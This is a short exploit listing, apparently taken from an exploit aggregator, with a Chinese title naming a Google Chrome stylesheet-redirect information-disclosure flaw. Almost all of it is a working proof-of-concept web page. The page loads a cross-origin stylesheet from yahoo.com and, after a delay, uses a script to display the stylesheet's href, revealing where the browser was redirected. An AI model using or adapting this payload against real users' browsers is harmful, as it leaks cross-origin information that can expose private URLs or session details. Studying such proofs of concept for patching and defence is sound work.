Exploit for Google Chrome样式表重新定向信息泄露漏洞
Exploit Code
## https://sploitus.com/exploit?id=SSV:19009
<link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>